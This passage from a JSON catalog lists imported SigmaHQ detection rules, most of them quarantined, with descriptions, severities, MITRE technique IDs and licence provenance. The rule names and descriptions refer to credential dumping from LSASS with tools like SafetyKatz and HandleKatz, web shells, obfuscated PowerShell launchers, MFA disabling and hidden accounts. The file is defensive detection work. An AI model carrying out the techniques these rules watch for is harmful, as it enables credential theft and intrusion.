"description": "Shadow Copies creation using operating systems utilities, possible credential access", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003", "T1003.002", "T1003.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/shadow-copies-creation-using-operating-systems-utilities.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b17ea6f7-6e90-447e-a799-e6c0a493d6ce", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_shadow_copies_creation.yml" } }, { "id": "sigmahq-sigma-b18454c8-0be3-41f7-86bc-9c614611b839", "type": "detection", "name": "Multi Factor Authentication Disabled For User Account", "description": "Detects changes to the \"StrongAuthenticationRequirement\" value, where the state is set to \"0\" or \"Disabled\".\nThreat actors were seen disabling multi factor authentication for users in order to maintain or achieve access to the account. Also see in SIM Swap attacks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/multi-factor-authentication-disabled-for-user-account.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b18454c8-0be3-41f7-86bc-9c614611b839", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/audit_logs/azure_user_account_mfa_disable.yml" } }, { "id": "sigmahq-sigma-b1876533-4ed5-4a83-90f3-b8645840a413", "type": "detection", "name": "HackTool - SafetyKatz Execution", "description": "Detects the execution of the hacktool SafetyKatz via PE information and default Image name", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-safetykatz-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b1876533-4ed5-4a83-90f3-b8645840a413", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_safetykatz.yml" } }, { "id": "sigmahq-sigma-b18c9d4c-fac9-4708-bd06-dd5bfacf200f", "type": "detection", "name": "HackTool - F-Secure C3 Load by Rundll32", "description": "F-Secure C3 produces DLLs with a default exported StartNodeRelay function.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1218.011" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-f-secure-c3-load-by-rundll32.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b18c9d4c-fac9-4708-bd06-dd5bfacf200f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_c3_rundll32_pattern.yml" } }, { "id": "sigmahq-sigma-b19146a3-25d4-41b4-928b-1e2a92641b1b", "type": "detection", "name": "Remote Access Tool - ScreenConnect Server Web Shell Execution", "description": "Detects potential web shell execution from the ScreenConnect server process.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-access-tool-screenconnect-server-web-shell-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b19146a3-25d4-41b4-928b-1e2a92641b1b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_remote_access_tools_screenconnect_webshell.yml" } }, { "id": "sigmahq-sigma-b1bc08d1-8224-4758-a0e6-fbcfc98c73bb", "type": "detection", "name": "Roles Assigned Outside PIM", "description": "Identifies when a privilege role assignment has taken place outside of PIM and may indicate an attack.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/roles-assigned-outside-pim.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b1bc08d1-8224-4758-a0e6-fbcfc98c73bb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/privileged_identity_management/azure_pim_role_assigned_outside_of_pim.yml" } }, { "id": "sigmahq-sigma-b1bd3a59-c1fd-4860-9f40-4dd161a7d1f5", "type": "detection", "name": "HackTool - HandleKatz Duplicating LSASS Handle", "description": "Detects HandleKatz opening LSASS to duplicate its handle to later dump the memory without opening any new handles", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1106", "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-handlekatz-duplicating-lsass-handle.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b1bd3a59-c1fd-4860-9f40-4dd161a7d1f5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_access/proc_access_win_hktl_handlekatz_lsass_access.yml" } }, { "id": "sigmahq-sigma-b1c50487-1967-4315-a026-6491686d860e", "type": "detection", "name": "Office Macro File Creation From Suspicious Process", "description": "Detects the creation of a office macro file from a a suspicious process", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1566.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/office-macro-file-creation-from-suspicious-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b1c50487-1967-4315-a026-6491686d860e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_office_macro_files_from_susp_process.yml" } }, { "id": "sigmahq-sigma-b1cb4ab6-ac31-43f4-adf1-d9d08957419c", "type": "detection", "name": "PUA - PingCastle Execution", "description": "Detects the execution of PingCastle, a tool designed to quickly assess the Active Directory security level.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1595" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-pingcastle-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b1cb4ab6-ac31-43f4-adf1-d9d08957419c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_pua_pingcastle.yml" } }, { "id": "sigmahq-sigma-b1decb61-ed83-4339-8e95-53ea51901720", "type": "detection", "name": "TeamViewer Log File Deleted", "description": "Detects the deletion of the TeamViewer log files which may indicate an attempt to destroy forensic evidence", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1070.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/teamviewer-log-file-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b1decb61-ed83-4339-8e95-53ea51901720", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_delete/file_delete_win_delete_teamviewer_logs.yml" } }, { "id": "sigmahq-sigma-b1e0b3f5-b62e-41be-886a-daffde446ad4", "type": "detection", "name": "No Suitable Encryption Key Found For Generating Kerberos Ticket", "description": "Detects errors when a target server doesn't have suitable keys for generating kerberos tickets.\nThis issue can occur for example when a service uses a user account or a computer account that is configured for only DES encryption on a computer that is running Windows 7 which has DES encryption for Kerberos authentication disabled.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1558.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/no-suitable-encryption-key-found-for-generating-kerberos-ticket.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b1e0b3f5-b62e-41be-886a-daffde446ad4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/microsoft_windows_kerberos_key_distribution_center/win_system_kdcsvc_tgs_no_suitable_encryption_key_found.yml" } }, { "id": "sigmahq-sigma-b1e5da3b-ca8e-4adf-915c-9921f3d85481", "type": "detection", "name": "RDP to HTTP or HTTPS Target Ports", "description": "Detects svchost hosting RDP termsvcs communicating to target systems on TCP port 80 or 443", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1572", "T1021.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/rdp-to-http-or-https-target-ports.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b1e5da3b-ca8e-4adf-915c-9921f3d85481", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/network_connection/net_connection_win_rdp_to_http.yml" } }, { "id": "sigmahq-sigma-b1ec66c6-f4d1-4b5c-96dd-af28ccae7727", "type": "detection", "name": "New Generic Credentials Added Via Cmdkey.EXE", "description": "Detects usage of \"cmdkey.exe\" to add generic credentials.\nAs an example, this can be used before connecting to an RDP session via command line interface.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-generic-credentials-added-via-cmdkey-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b1ec66c6-f4d1-4b5c-96dd-af28ccae7727", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_cmdkey_adding_generic_creds.yml" } }, { "id": "sigmahq-sigma-b1f73849-6329-4069-bc8f-78a604bb8b23", "type": "detection", "name": "Remote Access Tool - ScreenConnect Remote Command Execution", "description": "Detects the execution of a system command via the ScreenConnect RMM service.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1059.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-access-tool-screenconnect-remote-command-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b1f73849-6329-4069-bc8f-78a604bb8b23", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_remote_access_tools_screenconnect_remote_execution.yml" } }, { "id": "sigmahq-sigma-b207d563-a1d9-4275-b349-77d1eb55aa6d", "type": "detection", "name": "System Info Discovery via Sysinfo Syscall", "description": "Detects use of the sysinfo system call in Linux, which provides a snapshot of key system statistics such as uptime, load averages, memory usage, and the number of running processes.\nMalware or reconnaissance tools might leverage sysinfo to fingerprint the system - gathering data to determine if it's a viable target.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1057", "T1082" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/system-info-discovery-via-sysinfo-syscall.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b207d563-a1d9-4275-b349-77d1eb55aa6d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/syscall/lnx_auditd_susp_discovery_sysinfo_syscall.yml" } }, { "id": "sigmahq-sigma-b210394c-ba12-4f89-9117-44a2464b9511", "type": "detection", "name": "SMB Create Remote File Admin Share", "description": "Look for non-system accounts SMB accessing a file with write (0x2) access mask via administrative share (i.e C$).", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1021.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/smb-create-remote-file-admin-share.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b210394c-ba12-4f89-9117-44a2464b9511", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_smb_file_creation_admin_shares.yml" } }, { "id": "sigmahq-sigma-b222df08-0e07-11eb-adc1-0242ac120002", "type": "detection", "name": "Invoke-Obfuscation CLIP+ Launcher", "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-clip-launcher.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b222df08-0e07-11eb-adc1-0242ac120002", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_clip.yml" } }, { "id": "sigmahq-sigma-b22a5b36-2431-493a-8be1-0bae56c28ef3", "type": "detection", "name": "Hidden User Creation", "description": "Detects creation of a hidden user account on macOS (UserID < 500) or with IsHidden option", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1564.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hidden-user-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b22a5b36-2431-493a-8be1-0bae56c28ef3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_create_hidden_account.yml" } }, { "id": "sigmahq-sigma-b2309017-4235-44fe-b5af-b15363011957", "type": "detection", "name": "Uncommon Child Process Of Defaultpack.EXE", "description": "Detects uncommon child processes of \"DefaultPack.EXE\" binary as a proxy to launch other programs", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uncommon-child-process-of-defaultpack-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b2309017-4235-44fe-b5af-b15363011957", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_defaultpack_uncommon_child_process.yml" } }, { "id": "sigmahq-sigma-b2317cfa-4a47-4ead-b3ff-297438c0bc2d", "type": "detection", "name": "HackTool - SharpView Execution", "description": "Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1049", "T1069.002", "T1482", "T1135", "T1033" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-sharpview-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b2317cfa-4a47-4ead-b3ff-297438c0bc2d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_sharpview.yml" } }, { "id": "sigmahq-sigma-b236190c-1c61-41e9-84b3-3fe03f6d76b0", "type": "detection", "name": "Potential Regsvr32 Commandline Flag Anomaly", "description": "Detects a potential command line flag anomaly related to \"regsvr32\" in which the \"/i\" flag is used without the \"/n\" which should be uncommon.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.010" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-regsvr32-commandline-flag-anomaly.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b236190c-1c61-41e9-84b3-3fe03f6d76b0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_regsvr32_flags_anomaly.yml" } }, { "id": "sigmahq-sigma-b237c54b-0f15-4612-a819-44b735e0de27", "type": "detection", "name": "A Security-Enabled Global Group Was Deleted", "description": "Detects activity when a security-enabled global group is deleted", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "endpoint", "mitre_techniques": [ "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/a-security-enabled-global-group-was-deleted.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b237c54b-0f15-4612-a819-44b735e0de27", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/account_management/win_security_security_enabled_global_group_deleted.yml" } }, { "id": "sigmahq-sigma-b23818c7-e575-4d13-8012-332075ec0a2b", "type": "detection", "name": "Register New IFiltre For Persistence", "description": "Detects when an attacker registers a new IFilter for an extension. Microsoft Windows Search uses filters to extract the content of items for inclusion in a full-text index.\nYou can extend Windows Search to index new or proprietary file types by writing filters to extract the content, and property handlers to extract the properties of files.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/register-new-ifiltre-for-persistence.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b23818c7-e575-4d13-8012-332075ec0a2b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_persistence_ifilter.yml" } }, { "id": "sigmahq-sigma-b243b280-65fe-48df-ba07-6ddea7646427", "type": "detection", "name": "Discovery of a System Time", "description": "Identifies use of various commands to query a systems time. This technique may be used before executing a scheduled task or to discover the time zone of a target system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1124" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/discovery-of-a-system-time.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b243b280-65fe-48df-ba07-6ddea7646427", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_remote_time_discovery.yml" } }, { "id": "sigmahq-sigma-b2572bf9-e20a-4594-b528-40bde666525a", "type": "detection", "name": "Impossible Travel", "description": "Identifies user activities originating from geographically distant locations within a time period shorter than the time it takes to travel from the first location to the second.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/impossible-travel.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b2572bf9-e20a-4594-b528-40bde666525a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/identity_protection/azure_identity_protection_impossible_travel.yml" } }, { "id": "sigmahq-sigma-b26647de-4feb-4283-af6b-6117661283c5", "type": "detection", "name": "Powershell Suspicious Win32_PnPEntity", "description": "Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1120" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-suspicious-win32-pnpentity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b26647de-4feb-4283-af6b-6117661283c5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_susp_win32_pnpentity.yml" } }, { "id": "sigmahq-sigma-b27077d6-23e6-45d2-81a0-e2b356eea5fd", "type": "detection", "name": "Use of TTDInject.exe", "description": "Detects the executiob of TTDInject.exe, which is used by Windows 10 v1809 and newer to debug time travel (underlying call of tttracer.exe)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1127" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/use-of-ttdinject-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b27077d6-23e6-45d2-81a0-e2b356eea5fd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lolbin_ttdinject.yml" } }, { "id": "sigmahq-sigma-b2815d0d-7481-4bf0-9b6c-a4c48a94b349", "type": "detection", "name": "PowerShell Get-Process LSASS", "description": "Detects a \"Get-Process\" cmdlet and it's aliases on lsass process, which is in almost all cases a sign of malicious activity", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1552.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-get-process-lsass.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b2815d0d-7481-4bf0-9b6c-a4c48a94b349", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_getprocess_lsass.yml" } }, { "id": "sigmahq-sigma-b28e4eb3-8bbc-4f0c-819f-edfe8e2f25db", "type": "detection", "name": "ESXi Account Creation Via ESXCLI", "description": "Detects user account creation on ESXi system via esxcli", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1136", "T1059.012" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/esxi-account-creation-via-esxcli.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b28e4eb3-8bbc-4f0c-819f-edfe8e2f25db", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_esxcli_user_account_creation.yml" } }, { "id": "sigmahq-sigma-b28e58e4-2a72-4fae-bdee-0fbe904db642", "type": "detection", "name": "Windows Defender Real-time Protection Disabled", "description": "Detects disabling of Windows Defender Real-time Protection. As this event doesn't contain a lot of information on who initiated this action you might want to reduce it to a \"medium\" level if this occurs too many times in your environment", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/windows-defender-real-time-protection-disabled.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b28e58e4-2a72-4fae-bdee-0fbe904db642", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/windefend/win_defender_real_time_protection_disabled.yml" } }, { "id": "sigmahq-sigma-b29a93fb-087c-4b5b-a84d-ee3309e69d08", "type": "detection", "name": "Manipulation of User Computer or Group Security Principals Across AD", "description": "Adversaries may create a domain account to maintain access to victim systems.\nDomain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain..", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1136.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/manipulation-of-user-computer-or-group-security-principals-across-ad.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b29a93fb-087c-4b5b-a84d-ee3309e69d08", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", 